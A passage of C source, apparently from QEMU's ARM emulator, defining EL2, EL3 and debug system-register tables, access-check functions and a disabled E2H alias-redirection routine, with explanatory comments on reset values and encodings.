0, .opc2 = 1, .access = PL2_RW, .fieldoffset = offsetof(CPUARMState, elr_el[2]) }, { .name = "ESR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 5, .crm = 2, .opc2 = 0, .access = PL2_RW, .fieldoffset = offsetof(CPUARMState, cp15.esr_el[2]) }, { .name = "FAR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 6, .crm = 0, .opc2 = 0, .access = PL2_RW, .fieldoffset = offsetof(CPUARMState, cp15.far_el[2]) }, { .name = "HIFAR", .state = ARM_CP_STATE_AA32, .type = ARM_CP_ALIAS, .cp = 15, .opc1 = 4, .crn = 6, .crm = 0, .opc2 = 2, .access = PL2_RW, .fieldoffset = offsetofhigh32(CPUARMState, cp15.far_el[2]) }, { .name = "SPSR_EL2", .state = ARM_CP_STATE_AA64, .type = ARM_CP_ALIAS, .opc0 = 3, .opc1 = 4, .crn = 4, .crm = 0, .opc2 = 0, .access = PL2_RW, .fieldoffset = offsetof(CPUARMState, banked_spsr[BANK_HYP]) }, { .name = "VBAR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 12, .crm = 0, .opc2 = 0, .access = PL2_RW, .writefn = vbar_write, .fieldoffset = offsetof(CPUARMState, cp15.vbar_el[2]), .resetvalue = 0 }, { .name = "SP_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 6, .crn = 4, .crm = 1, .opc2 = 0, .access = PL3_RW, .type = ARM_CP_ALIAS, .fieldoffset = offsetof(CPUARMState, sp_el[2]) }, { .name = "CPTR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 1, .crm = 1, .opc2 = 2, .access = PL2_RW, .accessfn = cptr_access, .resetvalue = 0, .fieldoffset = offsetof(CPUARMState, cp15.cptr_el[2]), .readfn = cptr_el2_read, .writefn = cptr_el2_write }, { .name = "MAIR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 10, .crm = 2, .opc2 = 0, .access = PL2_RW, .fieldoffset = offsetof(CPUARMState, cp15.mair_el[2]), .resetvalue = 0 }, { .name = "HMAIR1", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 4, .crn = 10, .crm = 2, .opc2 = 1, .access = PL2_RW, .type = ARM_CP_ALIAS, .fieldoffset = offsetofhigh32(CPUARMState, cp15.mair_el[2]) }, { .name = "AMAIR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 10, .crm = 3, .opc2 = 0, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, /* HAMAIR1 is mapped to AMAIR_EL2[63:32] */ { .name = "HAMAIR1", .state = 
ARM_CP_STATE_AA32, .cp = 15, .opc1 = 4, .crn = 10, .crm = 3, .opc2 = 1, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "AFSR0_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 5, .crm = 1, .opc2 = 0, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "AFSR1_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 5, .crm = 1, .opc2 = 1, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "TCR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 2, .crm = 0, .opc2 = 2, .access = PL2_RW, .writefn = vmsa_tcr_el12_write, /* no .raw_writefn or .resetfn needed as we never use mask/base_mask */ .fieldoffset = offsetof(CPUARMState, cp15.tcr_el[2]) }, { .name = "VTCR", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 4, .crn = 2, .crm = 1, .opc2 = 2, .type = ARM_CP_ALIAS, .access = PL2_RW, .accessfn = access_el3_aa32ns, .fieldoffset = offsetof(CPUARMState, cp15.vtcr_el2) }, { .name = "VTCR_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 2, .crm = 1, .opc2 = 2, .access = PL2_RW, /* no .writefn needed as this can't cause an ASID change; * no .raw_writefn or .resetfn needed as we never use mask/base_mask */ .fieldoffset = offsetof(CPUARMState, cp15.vtcr_el2) }, { .name = "VTTBR", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 6, .crm = 2, .type = ARM_CP_64BIT | ARM_CP_ALIAS, .access = PL2_RW, .accessfn = access_el3_aa32ns, .fieldoffset = offsetof(CPUARMState, cp15.vttbr_el2), .writefn = vttbr_write }, { .name = "VTTBR_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 2, .crm = 1, .opc2 = 0, .access = PL2_RW, .writefn = vttbr_write, .fieldoffset = offsetof(CPUARMState, cp15.vttbr_el2) }, { .name = "SCTLR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 1, .crm = 0, .opc2 = 0, .access = PL2_RW, .raw_writefn = raw_write, .writefn = sctlr_write, .fieldoffset = offsetof(CPUARMState, cp15.sctlr_el[2]) }, { .name = "TPIDR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 13, .crm = 0, .opc2 = 2, .access = PL2_RW, .resetvalue = 0, .fieldoffset = offsetof(CPUARMState, cp15.tpidr_el[2]) }, { .name = "TTBR0_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 2, .crm = 0, .opc2 = 0, .access = PL2_RW, .resetvalue = 0, .writefn = vmsa_tcr_ttbr_el2_write, .fieldoffset = offsetof(CPUARMState, cp15.ttbr0_el[2]) }, { .name = "HTTBR", .cp = 15, .opc1 = 4, .crm = 2, .access = PL2_RW, .type = ARM_CP_64BIT | ARM_CP_ALIAS, .fieldoffset = offsetof(CPUARMState, cp15.ttbr0_el[2]) }, { .name = "TLBIALLNSNH", .cp = 15, .opc1 = 4, .crn = 8, .crm = 7, .opc2 = 4, .type = ARM_CP_NO_RAW, .access = PL2_W, .writefn = tlbiall_nsnh_write }, { .name = "TLBIALLNSNHIS", .cp = 15, .opc1 = 4, .crn = 8, .crm = 3, .opc2 = 4, .type = ARM_CP_NO_RAW, .access = PL2_W, .writefn = tlbiall_nsnh_is_write }, { .name = "TLBIALLH", .cp = 15, .opc1 = 4, .crn = 8, .crm = 7, .opc2 = 0, .type = ARM_CP_NO_RAW, .access = PL2_W, .writefn = tlbiall_hyp_write }, { .name = "TLBIALLHIS", .cp = 15, .opc1 = 4, .crn = 8, .crm = 3, .opc2 = 0, .type = ARM_CP_NO_RAW, .access = PL2_W, .writefn = tlbiall_hyp_is_write }, { .name = "TLBIMVAH", .cp = 15, .opc1 = 4, .crn = 8, .crm = 7, .opc2 = 1, .type = ARM_CP_NO_RAW, .access = PL2_W, .writefn = tlbimva_hyp_write }, { .name = "TLBIMVAHIS", .cp = 15, .opc1 = 4, .crn = 8, .crm = 3, .opc2 = 1, .type = ARM_CP_NO_RAW, .access = PL2_W, .writefn = tlbimva_hyp_is_write }, { .name = "TLBI_ALLE2", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 4, .crn = 8, .crm = 7, .opc2 = 0, .type = 
ARM_CP_NO_RAW, .access = PL2_W, .writefn = tlbi_aa64_alle2_write }, { .name = "TLBI_VAE2", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 4, .crn = 8, .crm = 7, .opc2 = 1, .type = ARM_CP_NO_RAW, .access = PL2_W, .writefn = tlbi_aa64_vae2_write }, { .name = "TLBI_VALE2", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 4, .crn = 8, .crm = 7, .opc2 = 5, .access = PL2_W, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_vae2_write }, { .name = "TLBI_ALLE2IS", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 4, .crn = 8, .crm = 3, .opc2 = 0, .access = PL2_W, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_alle2is_write }, { .name = "TLBI_VAE2IS", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 4, .crn = 8, .crm = 3, .opc2 = 1, .type = ARM_CP_NO_RAW, .access = PL2_W, .writefn = tlbi_aa64_vae2is_write }, { .name = "TLBI_VALE2IS", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 4, .crn = 8, .crm = 3, .opc2 = 5, .access = PL2_W, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_vae2is_write }, /* Unlike the other EL2-related AT operations, these must * UNDEF from EL3 if EL2 is not implemented, which is why we * define them here rather than with the rest of the AT ops. */ { .name = "AT_S1E2R", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 4, .crn = 7, .crm = 8, .opc2 = 0, .access = PL2_W, .accessfn = at_s1e2_access, .type = ARM_CP_NO_RAW | ARM_CP_RAISES_EXC, .writefn = ats_write64 }, { .name = "AT_S1E2W", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 4, .crn = 7, .crm = 8, .opc2 = 1, .access = PL2_W, .accessfn = at_s1e2_access, .type = ARM_CP_NO_RAW | ARM_CP_RAISES_EXC, .writefn = ats_write64 }, /* The AArch32 ATS1H* operations are CONSTRAINED UNPREDICTABLE * if EL2 is not implemented; we choose to UNDEF. Behaviour at EL3 * with SCR.NS == 0 outside Monitor mode is UNPREDICTABLE; we choose * to behave as if SCR.NS was 1. */ { .name = "ATS1HR", .cp = 15, .opc1 = 4, .crn = 7, .crm = 8, .opc2 = 0, .access = PL2_W, .writefn = ats1h_write, .type = ARM_CP_NO_RAW | ARM_CP_RAISES_EXC }, { .name = "ATS1HW", .cp = 15, .opc1 = 4, .crn = 7, .crm = 8, .opc2 = 1, .access = PL2_W, .writefn = ats1h_write, .type = ARM_CP_NO_RAW | ARM_CP_RAISES_EXC }, { .name = "CNTHCTL_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 14, .crm = 1, .opc2 = 0, /* ARMv7 requires bit 0 and 1 to reset to 1. ARMv8 defines the * reset values as IMPDEF. We choose to reset to 3 to comply with * both ARMv7 and ARMv8. 
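     * In the non-VHE layout bit 0 is EL1PCTEN and bit 1 is EL1PCEN, so
     * the reset value of 3 leaves EL1/EL0 access to the physical
     * counter and physical timer untrapped; equivalently:
     *
     *     cnthctl_el2 = (1 << 1) | (1 << 0);   // EL1PCEN | EL1PCTEN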
*/ .access = PL2_RW, .resetvalue = 3, .fieldoffset = offsetof(CPUARMState, cp15.cnthctl_el2) }, { .name = "CNTVOFF_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 14, .crm = 0, .opc2 = 3, .access = PL2_RW, .type = ARM_CP_IO, .resetvalue = 0, .writefn = gt_cntvoff_write, .fieldoffset = offsetof(CPUARMState, cp15.cntvoff_el2) }, { .name = "CNTVOFF", .cp = 15, .opc1 = 4, .crm = 14, .access = PL2_RW, .type = ARM_CP_64BIT | ARM_CP_ALIAS | ARM_CP_IO, .writefn = gt_cntvoff_write, .fieldoffset = offsetof(CPUARMState, cp15.cntvoff_el2) }, { .name = "CNTHP_CVAL_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 14, .crm = 2, .opc2 = 2, .fieldoffset = offsetof(CPUARMState, cp15.c14_timer[GTIMER_HYP].cval), .type = ARM_CP_IO, .access = PL2_RW, .writefn = gt_hyp_cval_write, .raw_writefn = raw_write }, { .name = "CNTHP_CVAL", .cp = 15, .opc1 = 6, .crm = 14, .fieldoffset = offsetof(CPUARMState, cp15.c14_timer[GTIMER_HYP].cval), .access = PL2_RW, .type = ARM_CP_64BIT | ARM_CP_IO, .writefn = gt_hyp_cval_write, .raw_writefn = raw_write }, { .name = "CNTHP_TVAL_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 14, .crm = 2, .opc2 = 0, .type = ARM_CP_NO_RAW | ARM_CP_IO, .access = PL2_RW, .resetfn = gt_hyp_timer_reset, .readfn = gt_hyp_tval_read, .writefn = gt_hyp_tval_write }, { .name = "CNTHP_CTL_EL2", .state = ARM_CP_STATE_BOTH, .type = ARM_CP_IO, .opc0 = 3, .opc1 = 4, .crn = 14, .crm = 2, .opc2 = 1, .access = PL2_RW, .fieldoffset = offsetof(CPUARMState, cp15.c14_timer[GTIMER_HYP].ctl), .resetvalue = 0, .writefn = gt_hyp_ctl_write, .raw_writefn = raw_write }, /* The only field of MDCR_EL2 that has a defined architectural reset value * is MDCR_EL2.HPMN which should reset to the value of PMCR_EL0.N; but we * don't implement any PMU event counters, so using zero as a reset * value for MDCR_EL2 is okay */ { .name = "MDCR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 1, .crm = 1, .opc2 = 1, .access = PL2_RW, .resetvalue = 0, .fieldoffset = offsetof(CPUARMState, cp15.mdcr_el2), }, { .name = "HPFAR", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 4, .crn = 6, .crm = 0, .opc2 = 4, .access = PL2_RW, .accessfn = access_el3_aa32ns, .fieldoffset = offsetof(CPUARMState, cp15.hpfar_el2) }, { .name = "HPFAR_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 6, .crm = 0, .opc2 = 4, .access = PL2_RW, .fieldoffset = offsetof(CPUARMState, cp15.hpfar_el2) }, { .name = "HSTR_EL2", .state = ARM_CP_STATE_BOTH, .cp = 15, .opc0 = 3, .opc1 = 4, .crn = 1, .crm = 1, .opc2 = 3, .access = PL2_RW, .fieldoffset = offsetof(CPUARMState, cp15.hstr_el2) }, REGINFO_SENTINEL }; static const ARMCPRegInfo el2_v8_cp_reginfo[] = { { .name = "HCR2", .state = ARM_CP_STATE_AA32, .type = ARM_CP_ALIAS | ARM_CP_IO, .cp = 15, .opc1 = 4, .crn = 1, .crm = 1, .opc2 = 4, .access = PL2_RW, .fieldoffset = offsetofhigh32(CPUARMState, cp15.hcr_el2), .writefn = hcr_writehigh }, REGINFO_SENTINEL }; static CPAccessResult nsacr_access(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { /* The NSACR is RW at EL3, and RO for NS EL1 and NS EL2. * At Secure EL1 it traps to EL3. */ if (arm_current_el(env) == 3) { return CP_ACCESS_OK; } if (arm_is_secure_below_el3(env)) { return CP_ACCESS_TRAP_EL3; } /* Accesses from EL1 NS and EL2 NS are UNDEF for write but allow reads. 
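     * Summarised as a table (matching the checks below):
     *
     *     EL3                  read OK     write OK
     *     Secure EL1           trap to EL3
     *     NS EL1 / NS EL2      read OK     write UNDEFINED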
*/ if (isread) { return CP_ACCESS_OK; } return CP_ACCESS_TRAP_UNCATEGORIZED; } static const ARMCPRegInfo el3_cp_reginfo[] = { { .name = "SCR_EL3", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 6, .crn = 1, .crm = 1, .opc2 = 0, .access = PL3_RW, .fieldoffset = offsetof(CPUARMState, cp15.scr_el3), .resetvalue = 0, .writefn = scr_write }, { .name = "SCR", .type = ARM_CP_ALIAS | ARM_CP_NEWEL, .cp = 15, .opc1 = 0, .crn = 1, .crm = 1, .opc2 = 0, .access = PL1_RW, .accessfn = access_trap_aa32s_el1, .fieldoffset = offsetoflow32(CPUARMState, cp15.scr_el3), .writefn = scr_write }, { .name = "SDER32_EL3", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 6, .crn = 1, .crm = 1, .opc2 = 1, .access = PL3_RW, .resetvalue = 0, .fieldoffset = offsetof(CPUARMState, cp15.sder) }, { .name = "SDER", .cp = 15, .opc1 = 0, .crn = 1, .crm = 1, .opc2 = 1, .access = PL3_RW, .resetvalue = 0, .fieldoffset = offsetoflow32(CPUARMState, cp15.sder) }, { .name = "MVBAR", .cp = 15, .opc1 = 0, .crn = 12, .crm = 0, .opc2 = 1, .access = PL1_RW, .accessfn = access_trap_aa32s_el1, .writefn = vbar_write, .resetvalue = 0, .fieldoffset = offsetof(CPUARMState, cp15.mvbar) }, { .name = "TTBR0_EL3", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 6, .crn = 2, .crm = 0, .opc2 = 0, .access = PL3_RW, .resetvalue = 0, .fieldoffset = offsetof(CPUARMState, cp15.ttbr0_el[3]) }, { .name = "TCR_EL3", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 6, .crn = 2, .crm = 0, .opc2 = 2, .access = PL3_RW, /* no .writefn needed as this can't cause an ASID change; * we must provide a .raw_writefn and .resetfn because we handle * reset and migration for the AArch32 TTBCR(S), which might be * using mask and base_mask. */ .resetfn = vmsa_ttbcr_reset, .raw_writefn = vmsa_ttbcr_raw_write, .fieldoffset = offsetof(CPUARMState, cp15.tcr_el[3]) }, { .name = "ELR_EL3", .state = ARM_CP_STATE_AA64, .type = ARM_CP_ALIAS, .opc0 = 3, .opc1 = 6, .crn = 4, .crm = 0, .opc2 = 1, .access = PL3_RW, .fieldoffset = offsetof(CPUARMState, elr_el[3]) }, { .name = "ESR_EL3", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 6, .crn = 5, .crm = 2, .opc2 = 0, .access = PL3_RW, .fieldoffset = offsetof(CPUARMState, cp15.esr_el[3]) }, { .name = "FAR_EL3", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 6, .crn = 6, .crm = 0, .opc2 = 0, .access = PL3_RW, .fieldoffset = offsetof(CPUARMState, cp15.far_el[3]) }, { .name = "SPSR_EL3", .state = ARM_CP_STATE_AA64, .type = ARM_CP_ALIAS, .opc0 = 3, .opc1 = 6, .crn = 4, .crm = 0, .opc2 = 0, .access = PL3_RW, .fieldoffset = offsetof(CPUARMState, banked_spsr[BANK_MON]) }, { .name = "VBAR_EL3", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 6, .crn = 12, .crm = 0, .opc2 = 0, .access = PL3_RW, .writefn = vbar_write, .fieldoffset = offsetof(CPUARMState, cp15.vbar_el[3]), .resetvalue = 0 }, { .name = "CPTR_EL3", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 6, .crn = 1, .crm = 1, .opc2 = 2, .access = PL3_RW, .accessfn = cptr_access, .resetvalue = 0, .fieldoffset = offsetof(CPUARMState, cp15.cptr_el[3]) }, { .name = "TPIDR_EL3", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 6, .crn = 13, .crm = 0, .opc2 = 2, .access = PL3_RW, .resetvalue = 0, .fieldoffset = offsetof(CPUARMState, cp15.tpidr_el[3]) }, { .name = "AMAIR_EL3", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 6, .crn = 10, .crm = 3, .opc2 = 0, .access = PL3_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "AFSR0_EL3", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 6, .crn = 5, .crm = 1, .opc2 = 0, .access = PL3_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "AFSR1_EL3", .state = 
ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 6, .crn = 5, .crm = 1, .opc2 = 1, .access = PL3_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "TLBI_ALLE3IS", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 6, .crn = 8, .crm = 3, .opc2 = 0, .access = PL3_W, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_alle3is_write }, { .name = "TLBI_VAE3IS", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 6, .crn = 8, .crm = 3, .opc2 = 1, .access = PL3_W, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_vae3is_write }, { .name = "TLBI_VALE3IS", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 6, .crn = 8, .crm = 3, .opc2 = 5, .access = PL3_W, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_vae3is_write }, { .name = "TLBI_ALLE3", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 6, .crn = 8, .crm = 7, .opc2 = 0, .access = PL3_W, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_alle3_write }, { .name = "TLBI_VAE3", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 6, .crn = 8, .crm = 7, .opc2 = 1, .access = PL3_W, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_vae3_write }, { .name = "TLBI_VALE3", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 6, .crn = 8, .crm = 7, .opc2 = 5, .access = PL3_W, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_vae3_write }, REGINFO_SENTINEL }; static void define_arm_vh_e2h_redirects_aliases(ARMCPU *cpu) { #if 0 struct E2HAlias { uint32_t src_key, dst_key, new_key; const char *src_name, *dst_name, *new_name; bool (*feature)(const ARMISARegisters *id); }; #define K(op0, op1, crn, crm, op2) \ ENCODE_AA64_CP_REG(CP_REG_ARM64_SYSREG_CP, crn, crm, op0, op1, op2) static const struct E2HAlias aliases[] = { { K(3, 0, 1, 0, 0), K(3, 4, 1, 0, 0), K(3, 5, 1, 0, 0), "SCTLR", "SCTLR_EL2", "SCTLR_EL12" }, { K(3, 0, 1, 0, 2), K(3, 4, 1, 1, 2), K(3, 5, 1, 0, 2), "CPACR", "CPTR_EL2", "CPACR_EL12" }, { K(3, 0, 2, 0, 0), K(3, 4, 2, 0, 0), K(3, 5, 2, 0, 0), "TTBR0_EL1", "TTBR0_EL2", "TTBR0_EL12" }, { K(3, 0, 2, 0, 1), K(3, 4, 2, 0, 1), K(3, 5, 2, 0, 1), "TTBR1_EL1", "TTBR1_EL2", "TTBR1_EL12" }, { K(3, 0, 2, 0, 2), K(3, 4, 2, 0, 2), K(3, 5, 2, 0, 2), "TCR_EL1", "TCR_EL2", "TCR_EL12" }, { K(3, 0, 4, 0, 0), K(3, 4, 4, 0, 0), K(3, 5, 4, 0, 0), "SPSR_EL1", "SPSR_EL2", "SPSR_EL12" }, { K(3, 0, 4, 0, 1), K(3, 4, 4, 0, 1), K(3, 5, 4, 0, 1), "ELR_EL1", "ELR_EL2", "ELR_EL12" }, { K(3, 0, 5, 1, 0), K(3, 4, 5, 1, 0), K(3, 5, 5, 1, 0), "AFSR0_EL1", "AFSR0_EL2", "AFSR0_EL12" }, { K(3, 0, 5, 1, 1), K(3, 4, 5, 1, 1), K(3, 5, 5, 1, 1), "AFSR1_EL1", "AFSR1_EL2", "AFSR1_EL12" }, { K(3, 0, 5, 2, 0), K(3, 4, 5, 2, 0), K(3, 5, 5, 2, 0), "ESR_EL1", "ESR_EL2", "ESR_EL12" }, { K(3, 0, 6, 0, 0), K(3, 4, 6, 0, 0), K(3, 5, 6, 0, 0), "FAR_EL1", "FAR_EL2", "FAR_EL12" }, { K(3, 0, 10, 2, 0), K(3, 4, 10, 2, 0), K(3, 5, 10, 2, 0), "MAIR_EL1", "MAIR_EL2", "MAIR_EL12" }, { K(3, 0, 10, 3, 0), K(3, 4, 10, 3, 0), K(3, 5, 10, 3, 0), "AMAIR0", "AMAIR_EL2", "AMAIR_EL12" }, { K(3, 0, 12, 0, 0), K(3, 4, 12, 0, 0), K(3, 5, 12, 0, 0), "VBAR", "VBAR_EL2", "VBAR_EL12" }, { K(3, 0, 13, 0, 1), K(3, 4, 13, 0, 1), K(3, 5, 13, 0, 1), "CONTEXTIDR_EL1", "CONTEXTIDR_EL2", "CONTEXTIDR_EL12" }, { K(3, 0, 14, 1, 0), K(3, 4, 14, 1, 0), K(3, 5, 14, 1, 0), "CNTKCTL", "CNTHCTL_EL2", "CNTKCTL_EL12" }, /* * Note that redirection of ZCR is mentioned in the description * of ZCR_EL2, and aliasing in the description of ZCR_EL1, but * not in the summary table. 
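         *
         * For reference, K() packs a full system register encoding, so
         * the ZCR_EL1 source key below is
         *
         *     K(3, 0, 1, 2, 0)   // op0=3, op1=0, CRn=1, CRm=2, op2=0
         *
         * which is the architectural encoding of ZCR_EL1.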
*/ { K(3, 0, 1, 2, 0), K(3, 4, 1, 2, 0), K(3, 5, 1, 2, 0), "ZCR_EL1", "ZCR_EL2", "ZCR_EL12", isar_feature_aa64_sve }, /* TODO: ARMv8.2-SPE -- PMSCR_EL2 */ /* TODO: ARMv8.4-Trace -- TRFCR_EL2 */ }; #undef K size_t i; for (i = 0; i < ARRAY_SIZE(aliases); i++) { const struct E2HAlias *a = &aliases[i]; ARMCPRegInfo *src_reg, *dst_reg; if (a->feature && !a->feature(&cpu->isar)) { continue; } src_reg = g_hash_table_lookup(cpu->cp_regs, &a->src_key); dst_reg = g_hash_table_lookup(cpu->cp_regs, &a->dst_key); g_assert(src_reg != NULL); g_assert(dst_reg != NULL); /* Cross-compare names to detect typos in the keys. */ g_assert(strcmp(src_reg->name, a->src_name) == 0); g_assert(strcmp(dst_reg->name, a->dst_name) == 0); /* None of the core system registers use opaque; we will. */ g_assert(src_reg->opaque == NULL); /* Create alias before redirection so we dup the right data. */ if (a->new_key) { ARMCPRegInfo *new_reg = g_memdup(src_reg, sizeof(ARMCPRegInfo)); uint32_t *new_key = g_memdup(&a->new_key, sizeof(uint32_t)); bool ok; new_reg->name = a->new_name; new_reg->type |= ARM_CP_ALIAS; /* Remove PL1/PL0 access, leaving PL2/PL3 R/W in place. */ new_reg->access &= PL2_RW | PL3_RW; ok = g_hash_table_insert(cpu->cp_regs, new_key, new_reg); g_assert(ok); } src_reg->opaque = dst_reg; src_reg->orig_readfn = src_reg->readfn ?: raw_read; src_reg->orig_writefn = src_reg->writefn ?: raw_write; if (!src_reg->raw_readfn) { src_reg->raw_readfn = raw_read; } if (!src_reg->raw_writefn) { src_reg->raw_writefn = raw_write; } src_reg->readfn = el2_e2h_read; src_reg->writefn = el2_e2h_write; } #endif } static CPAccessResult ctr_el0_access(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { int cur_el = arm_current_el(env); if (cur_el < 2) { uint64_t hcr = arm_hcr_el2_eff(env); if (cur_el == 0) { if ((hcr & (HCR_E2H | HCR_TGE)) == (HCR_E2H | HCR_TGE)) { if (!(env->cp15.sctlr_el[2] & SCTLR_UCT)) { return CP_ACCESS_TRAP_EL2; } } else { if (!(env->cp15.sctlr_el[1] & SCTLR_UCT)) { return CP_ACCESS_TRAP; } if (hcr & HCR_TID2) { return CP_ACCESS_TRAP_EL2; } } } else if (hcr & HCR_TID2) { return CP_ACCESS_TRAP_EL2; } } return CP_ACCESS_OK; } static void oslar_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { /* Writes to OSLAR_EL1 may update the OS lock status, which can be * read via a bit in OSLSR_EL1. */ int oslock; if (ri->state == ARM_CP_STATE_AA32) { oslock = (value == 0xC5ACCE55); } else { oslock = value & 1; } env->cp15.oslsr_el1 = deposit32(env->cp15.oslsr_el1, 1, 1, oslock); } static const ARMCPRegInfo debug_cp_reginfo[] = { /* DBGDRAR, DBGDSAR: always RAZ since we don't implement memory mapped * debug components. The AArch64 version of DBGDRAR is named MDRAR_EL1; * unlike DBGDRAR it is never accessible from EL0. * DBGDSAR is deprecated and must RAZ from v8 anyway, so it has no AArch64 * accessor. */ { .name = "DBGDRAR", .cp = 14, .crn = 1, .crm = 0, .opc1 = 0, .opc2 = 0, .access = PL0_R, .accessfn = access_tdra, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "MDRAR_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 2, .opc1 = 0, .crn = 1, .crm = 0, .opc2 = 0, .access = PL1_R, .accessfn = access_tdra, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "DBGDSAR", .cp = 14, .crn = 2, .crm = 0, .opc1 = 0, .opc2 = 0, .access = PL0_R, .accessfn = access_tdra, .type = ARM_CP_CONST, .resetvalue = 0 }, /* Monitor debug system control register; the 32-bit alias is DBGDSCRext.
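     * Both views are declared with the same fieldoffset, so a write
     * made through the AArch32 DBGDSCRext encoding is immediately
     * visible to an AArch64 read of MDSCR_EL1: there is a single
     * backing slot,
     *
     *     env->cp15.mdscr_el1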
*/ { .name = "MDSCR_EL1", .state = ARM_CP_STATE_BOTH, .cp = 14, .opc0 = 2, .opc1 = 0, .crn = 0, .crm = 2, .opc2 = 2, .access = PL1_RW, .accessfn = access_tda, .fieldoffset = offsetof(CPUARMState, cp15.mdscr_el1), .resetvalue = 0 }, /* MDCCSR_EL0, aka DBGDSCRint. This is a read-only mirror of MDSCR_EL1. * We don't implement the configurable EL0 access. */ { .name = "MDCCSR_EL0", .state = ARM_CP_STATE_BOTH, .cp = 14, .opc0 = 2, .opc1 = 0, .crn = 0, .crm = 1, .opc2 = 0, .type = ARM_CP_ALIAS, .access = PL1_R, .accessfn = access_tda, .fieldoffset = offsetof(CPUARMState, cp15.mdscr_el1), }, { .name = "OSLAR_EL1", .state = ARM_CP_STATE_BOTH, .cp = 14, .opc0 = 2, .opc1 = 0, .crn = 1, .crm = 0, .opc2 = 4, .access = PL1_W, .type = ARM_CP_NO_RAW, .accessfn = access_tdosa, .writefn = oslar_write }, { .name = "OSLSR_EL1", .state = ARM_CP_STATE_BOTH, .cp = 14, .opc0 = 2, .opc1 = 0, .crn = 1, .crm = 1, .opc2 = 4, .access = PL1_R, .resetvalue = 10, .accessfn = access_tdosa, .fieldoffset = offsetof(CPUARMState, cp15.oslsr_el1) }, /* Dummy OSDLR_EL1: 32-bit Linux will read this */ { .name = "OSDLR_EL1", .state = ARM_CP_STATE_BOTH, .cp = 14, .opc0 = 2, .opc1 = 